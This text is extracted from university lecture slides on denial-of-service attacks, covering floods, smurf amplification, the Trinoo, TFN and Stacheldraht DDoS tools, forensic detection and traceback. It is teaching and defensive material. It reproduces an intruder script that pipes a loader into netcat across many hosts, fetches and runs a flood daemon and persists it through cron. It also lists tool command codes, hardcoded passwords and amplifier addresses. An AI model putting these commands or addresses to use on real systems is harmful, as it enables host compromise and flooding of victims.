Denial of Service CS 155 Spring Quarter David

Denial of Service CS 155 Spring Quarter David Brumley dbrumley@stanford. edu

Overview • • • Overview/History of Do. S Traditional Do. S DDo. S Tracking Do. S Preventative Measures Conclusion

Who are we talking about? Gov’t (NSA) R &D Labs/Universities Computer Professionals Exploit Writers Script Kiddies

Example: GRC. COM

Example: GRC. COM hi, its me, wicked, im the one nailing the server with udp and icmp packets, nice sisco router, btw im 13, its a new addition, nothin tracert cant handle, and ur on a t 3. . . so up ur connection foo, we will just keep comin at you, u cant stop us "script kiddies" because we are better than you, plain and simple. ---------Yo, u might not thing of this as anyomous, but its not real info, it’s a stolen earthlink, so its good, now, to speak of the implemented attacks, yeah its me, and the reason me and my 2 other contributers do this is because in a previous post you call us “script kiddies”, at least so I was told….

Classic Do. S • Fork/malloc() bomb • Flooding – June 1996 1 st Adv. on UDP flooding • Theme: Exploit finite queue or exposed unoptimized interface • Fix 1: limit interface • Fix 2: optimize interface

Example: SYN Flooding 1 Syn Ack 2 A SYNACK • Fix 1: Minimal state cache @ A • Fix 2: SYN Cookies B Overall Fixing is Non-Trivial Programming

Most Prevalent Attacks • Jolt/jolt 2: IP Fragment Reassembly (UDP and TCP) • Stream/raped: Flood with ACK’s • Trash: IGMP Flooding • Mix UDP/TCP/ICMP flooding • Starting to target routers instead of hosts

Distributed Attack: Smurf … 10’s to 100’s of hosts. .

Amplification Networks • Netscan. org 210. 95. 3. 128 427 (Korea) 203. 252. 30. 0 401 (Korea) 203. 252. 30. 255 390 (Korea) 210. 95. 3. 255 300 (Korea) 130. 87. 223. 255 174 (Japan) 206. 101. 110. 127 (US) • Average amplification: 4

Ping Attack PING 206. 101. 110. 127: 56 data bytes no reply from 206. 101. 110. 127 within 1 sec no reply from 206. 101. 110. 127 within 1 sec ….

Ping Attack 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=127 ms. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=171 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=175 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=181 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=185 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=216 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=220 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=222 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=229 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=230 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=241 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=243 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=248 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=254 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=259 ms, duplicate. ….

Ping Attack 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=1513 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=1518 ms, duplicate. …. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=1571 ms, duplicate. 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=1572 ms, duplicate. ….

Ping Attack packet seq=13 bounced at radio-adventures-corp. Washington. cw. net (208. 173. 12. 42): Time to live exceeded packet seq=13 bounced at radio-adventures-corp. Washington. cw. net (208. 173. 12. 42) : Time to live exceeded packet seq=13 bounced at 208. 155. 245. 6: Time to live exceeded packet seq=13 bounced at bar 6 -loopback. Washington. cw. net (206. 24. 226. 11): Time to live exceeded packet seq=13 bounced at 208. 155. 245. 6: Time to live exceeded 64 bytes from 206. 101. 110. 1: seq=13 ttl=21 time=6917 ms, duplicate. packet seq=13 bounced at bar 6 -loopback. Washington. cw. net (206. 24. 226. 11): Time to live exceeded

Bad guys point of view • What to do if smurf no longer works? – Admins could disable broadcast – Admins could filter from broadcast networks

Distributed Do. S Client Handlers/Masters Agents/Daemons

Building DDo. S Networks • • • Launch exploit Log in through back door Install daemon Install "rootkit" to hide daemon Repeat

Result of Exploit Normal System: sunset: security> telnet elaine Trying 171. 64. 15. 86. . . Connected to elaine 21. stanford. edu. Escape character is '^]'. UNIX(r) System V Release 4. 0 (elaine 21. Stanford. EDU) elaine 21. Stanford. EDU login: Hacked System: sunset: security> telnet jimi-hendrix 1524 Trying 171. 65. 38. 180. . . Connected to jimi-hendrix. Stanford. EDU (171. 65. 38. 180). Escape character is '^]'. # ls -altr /; total 1618 -r-xr-xr-x 1 root drwx------ 2 root drwxr-xr-x 1 root drwxrwxr-x 2 root sys 1541 Oct 14 1998. cshrc 8192 Apr 14 1999 lost+found 9 Apr 14 1999 bin 512 Apr 14 1999 mnt

Example Intruder Script • Automated exploit. /trin. sh | nc 128. aaa. 167. 217 1524 &. /trin. sh | nc 128. aaa. 167. 218 1524 &. /trin. sh | nc 128. aaa. 167. 219 1524 &. /trin. sh | nc 128. aaa. 187. 38 1524 &. /trin. sh | nc 128. bbb. 2. 80 1524 &. /trin. sh | nc 128. bbb. 2. 81 1524 &. /trin. sh | nc 128. bbb. 2. 238 1524 &. /trin. sh | nc 128. ccc. 12. 22 1524 &. /trin. sh | nc 128. ccc. 12. 50 1524 & • Trin. sh echo "rcp 192. 168. 0. 1: leaf /usr/sbin/rpc. listen" echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc. listen" echo "echo launching trinoo" echo "/usr/sbin/rpc. listen" echo "echo * * * /usr/sbin/rpc. listen > cron" echo "crontab cron" echo "echo launched" echo "exit"

RCP Jun 30 07: 55: 12 6 E: rmt_sgi 3 rshd[8111]: root@poot. Stanford. EDU as demos: cmd='/u sr/lib/sunw, rcp -f neet. tar' Jun 30 07: 55: 12 6 E: rmt_sgi 3 rshd[8112]: root@crash-bandit. Stanford. EDU as demos: cmd='/usr/lib/sunw, rcp -f neet. tar' Jun 30 07: 55: 12 6 E: rmt_sgi 3 rshd[8113]: root@galena. Stanford. EDU as demos: cmd=' /usr/lib/sunw, rcp -f neet. tar' Jun 30 07: 55: 12 6 E: rmt_sgi 3 rshd[8117]: root@gradegrinder. Stanford. EDU as demos: cmd='/usr/lib/sunw, rcp -f neet. tar' Jun 30 07: 55: 12 6 E: rmt_sgi 3 rshd[8124]: root@galena. Stanford. EDU as demos: cmd=' rcp -f neet. tar' Jun 30 07: 55: 12 6 E: rmt_sgi 3 rshd[8127]: root@poot. Stanford. EDU as demos: cmd='rc p -f neet. tar' …. Over 200 hosts compromised!

DDo. S Networks • • Trinoo: June/July 1999 TFN: August/September 1999 Stacheldraht: Sept/October 1999 IRC Botnet: More recent

Trinoo Overview • Communication – Attacker to Masters(s): 27665/tcp – Master to daemon(s): 27444/udp – Daemon to Master(s): 31335/udp • List of masters hard coded into clients • UDP Flooder

Trinoo Master • Daemon list blowfish encrypted • Crypt() password required for startup #. /master ? ? wrongpassword #. . . #. /master ? ? g. Orave trinoo v 1. 07 d 2+f 3+c

Trinoo Master Commands • • • die mtimer (set Do. S timer) dos IP mdie (password required) mping - send "PING" command, should get a "PONG" mdos info - print version information msize - Set Do. S packet size killdead - Solicits "*HELLO*" from clients, else removes entry bcast - list hosts mstop - attempt to stop Do. S. Not implemented : )

Analysis of Handler # strings - master. . . ---v v 1. 07 d 2+f 3+c trinoo %s l 44 adsl <- Cleartext daemon password sock 0 nm 1 VNMX… <- crypt(g 0 rave) local master 10: 09: 24 Sep 26 1999 trinoo %s [%s: %s] bind read *HELLO* Zso. TN. cq 4 X 31 <- Blowfish crypt key bored NEW Bcast - %s PONG %d Received from %s Warning: Connection from %s be. UBZb. Lt. K 7 kk. Y <- crypt(betalmostdone) trinoo %s. . [rpm 8 d/cb 4 Sx/]. . . Do. S: usage: dos Do. S: Packeting %s. aaa %s %s mdie Er. DVt 6 az. Hre. PE <- crypt(killme) for mdie: Disabling Bcasts. d 1 e %s mdie: password?

Daemon Forensics • • Starting the client sends "*HELLO*" to the master Commands of form "arg 1 password arg 2" - aaa pass IP - Do. S IP on random UDP ports - bbb pass N - Sets time limits - png pass - send a "PONG" to the master on port 31335/udp - d 1 e pass - • . . . Note that UNIX strings by default only displays 4 or more ASCII characters! # strings --bytes=3 ns | tail -15 socket bind recvfrom l 44 %s %s %s a. If 3 YWf. Ohw. V. aaa bbb shi png PONG d 1 e rsz xyz *HELLO*

Trinoo LSOF # lsof | egrep ": 31335|: 27665" master 1292 root 3 u inet 2460 UDP *: 31335 master 1292 root 4 u inet 2461 TCP *: 27665 (LISTEN) # lsof -p 1292 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME master 1292 root cwd DIR 3, 1 1024 14356 /tmp/. . . master 1292 root rtd DIR 3, 1 1024 2 / master 1292 root txt REG 3, 1 30492 14357 /tmp/. . . /master 1292 root mem REG 3, 1 342206 28976 /lib/ld-2. 1. 1. so master 1292 root mem REG 3, 1 63878 29116 /libcrypt-2. 1. 1. so master 1292 root mem REG 3, 1 4016683 29115 /libc-2. 1. 1. so master 1292 root 0 u CHR 4, 1 2967 /dev/tty 1 master 1292 root 1 u CHR 4, 1 2967 /dev/tty 1 master 1292 root 2 u CHR 4, 1 2967 /dev/tty 1 master 1292 root 3 u inet 2534 UDP *: 31335 master 1292 root 4 u inet 2535 TCP *: 27665 (LISTEN)

Trinoo Forensics • • Master IP addresses visible Enough strings to recognize daemon/master easily Listening TCP/UDP ports can be seen with "lsof" Attacker session not encrypted

Tribal Flood Network • Communication: – Client to handler: none – Handler <-> agent: ICMP Echo Reply • DOS Types – SYN – UDP – ICMP – With spoofing capabilities

TFN Handler -------------------------------[tribe flood network] (c) 1999 by Mixter usage: . /tfn [ip] [port] contains a list of numerical hosts that are ready to flood -1 for spoofmask type (specify 0 -3), -2 for packet size, is 0 for stop/status, 1 for udp, 2 for syn, 3 for icmp, 4 to bind a rootshell (specify port) 5 to smurf, first ip is target, further ips are broadcasts [ip] target ip[s], separated by @ if more than one [port] must be given for a syn flood, 0 = RANDOM ----------------------------------

TFN Commands #define ID_ACK */ #define ID_SHELL optional */ #define ID_PSIZE packets */ #define ID_SWITCH #define ID_STOPIT #define ID_SENDUDP #define ID_SENDSYN #define ID_SYNPORT #define ID_ICMP #define ID_SMURF 123 /* for replies to the client 456 /* to bind a rootshell, 789 /* to change size of udp/icmp 234 567 890 345 678 901 666 /* /* to switch spoofing mode */ to stop flooding */ to udp flood */ to syn flood */ to set port */ to icmp flood */ haps! */

Identifying an Agent ---------------------------------------td 5931 root cwd DIR 3, 5 1024 240721 /usr/libx/. . . td 5931 root rtd DIR 3, 1 1024 2/ td 5931 root txt REG 3, 5 297508 240734 /usr/libx/. . . /td td 5931 root 3 u sock 0, 0 92814 can't identify protocol ---------------------------------------

Network Example #. /tfn iplist 4 12345 [tribe flood network] (c) 1999 by Mixter # tcpdump -lnx -s 1518 icmp tcpdump: listening on eth 0 05: 51: 32. 706829 10. 0. 0. 1 > 192. 168. 0. 1: icmp: echo reply. . . . . 0000 64 d 1 01 c 8 0000 3132 3334 3500 05: 51: 32. 741556 192. 168. 0. 1 > 10. 0. 0. 1: icmp: echo reply. . . . . 0000 6 cae 007 b 0000 7368 656 c 6 c 20 626 f 756 e 6420 746 f 2070 6 f 72 7420 3132 3334 350 a 00 <- 0 x 01 C 8 = 456 base 10 “ 12345” in data portion <- 0 x 007 b= 123 base 10

Forensics • Easy to spot in lsof (+) • ICMP easy to disguise (-) • ICMP ECHO_REPLY often allowed through firewall (-) • Attackers session not encrypted

Stacheldraht • Communication: – Client <-> Handler: 16660/tcp – Handler <-> agent: 65000/tcp, ICMP_ECHOREPLY – Doesn’t use agent TCP for anything on versions I’ve seen • Client/handler traffic blowfish encrypted • UDP/TCP/ICMP flooding w/ spoofing

Stacheldraht Client and Handler • Client to handler blowfish encrypted w/ password “authentication” • Handler password “sicken” encrypted with crypt() • More proactive at identifying live/dead hosts: Similar to distributed network • Handler limited to 1000 agents

Handler Strings starting trinoo emulation. . . removing useful commands. - DONE available commands in this version are: -------------------------. mtimer. mudp. micmp. msyn. msort. mping. madd. mlist. msadd. msrem. distro. help. setusize. setisize. mdie. sprange. mstop. killall. showdead. showalive usage: . distro remember : the distro files need to be executable! that means: chmod +x linux. bin , chmod +x sol. bin ; )) sending distro request to all bcasts. . user : %s rcp server :

Stacheldraht Agent • Interesting addition: Upgrade feature via rcp • Attempts spoofed packet to handler to test if spoofing is possible • Handlers compiled in or can be in blowfish encrypted file (def pass = “randomsucks”) • On start sends to handler ID value 666 with data “skillz”, handler responds 667 with data “ficken”

Do. S Bot. Nets • Scan for vulnerable hosts • Infect • Join IRC channel and wait for further commands • Generally used for warez distribution as well • Example: Kaiten

Fighting DDo. S: Identify Agents • Strings of master in daemon • Finding master is important! • Dump and log as much as possible

Identifying DDo. S Agents • Counter-espionage/intrusion – Identify intruders signature – Look for that signature • RID

RID Examples start Agent. Stacheldraht send icmp type=0 id=668 data="" recv icmp type=0 id=669 data="sicken" nmatch=2 end Agent. Stacheldraht start Agent. Stacheldraht 4 send icmp type=0 id=6268 data="" recv icmp type=0 id=669 data="sicken" nmatch=2 end Agent. Stacheldraht 4

More RID Examples start Agent. TFN send icmp type=0 id=789 recv icmp type=0 id=123 nmatch=2 end Agent. TFN start Agent. Trinoo send udp dport=27444 data="png l 44 adsl" recv udp data="PONG" nmatch=1 end Agent. Trinoo

RID @ Stanford • start telnetd send tcp dport=7000 data="rn" recv tcp data="Ataman Telnetd" nmatch=1 end telnetd • . /rid -t 20 -b 255 -n 2 171. 64. 0. 0/16 **** 171. 64. 250. 82 infected with telnetd **** 171. 64. 245. 132 infected with telnetd **** 171. 64. 245. 76 infected with telnetd **** 171. 64. 245. 22 infected with telnetd **** 171. 64. 241. 116 infected with telnetd … • 156 Total!

General DDo. S Observations • Intruders mix encryption mechanisms • No architecture in security design • Easily recognizable via strings

Defending against Do. S • Resisting Do. S – Filtering – Traffic Shaping – Pure filtering • Ingress = incoming • Egress = outgoing • Locating attacker(s) – Logging – Automatic trace back – Packet tagging

Logging • Audit utilities: – Tcpdump – Argus – Cisco Netflow • Problem: huge data sets • Asta. com: netflow monitor

Input Logging 1. Log on to nearest router 2. Enable input debugging on router 3. Find upstream 4. Recurse v a

Controlled Flooding • Cheswick & Burch • Idea: Follow the slowest routers • Problems: obvious Attacker R 3 R 1 Victim R 2

Node Sampling - Savage et al Method 1 • Use fragment ID • Mark packets with prob. p of router address • Issues: – p > 0. 5 – Long time to infer path (-) – Multiple attackers at same dist (-) Attacker p(p-1)2 R 4 R 3 R 1 p(p-1) R 2 R 5 p R 6 Victim

Method 2: Edge Sampling • Add 3 fields: – 2 IP addresses making edge – Distance vector • Issues: – Space requirements (-) – p can be arbitrary (+) – Complexity (-) Attacker R 3 R 1 R 3, R 2 A, R 3 R 4 R 2, R 6 R 5 R 6 Fmt = Src, Dst Victim

Savage’s Compression Method • decides to fill in edge ID with prob. P. Set d=0 • Step 2 a: next hop b notices d=0, writes b xor a; d++ • Step 2 b: next hop notices d !=0, d++; A R 3 R 2 R 3 xor R 2 = R 3 R 1 R 2 xor R 1 = R 2 V Get R 1’s addr

Issues with Savage • Spread edge identification across multiple packets (+) • Combinatorial complexity during edge identification (-) (Fixed by Dean, Franklin, Stubblefield alg. ) • Reuse of IP fragment field (-) • Does not work on existing hardware (IRL) (-)

Research Areas • How vulnerable are P 2 P protocols? • How can we better identify the person vs. the program? • Automatic migration during an attack

Resources • Packetstormsecurity. com - DDOS Tools • Theorygroup. com - RID • www. washington. edu/People/dad David Dittrich’s analysis • www. cert. org/reports/dsit_worksho p. pdf CERT dealing with DDo. S

Questions? The End

Attacks Happen

General Direction • Encrypted traffic • Real software lifecycles • Target name servers and other essential network equipment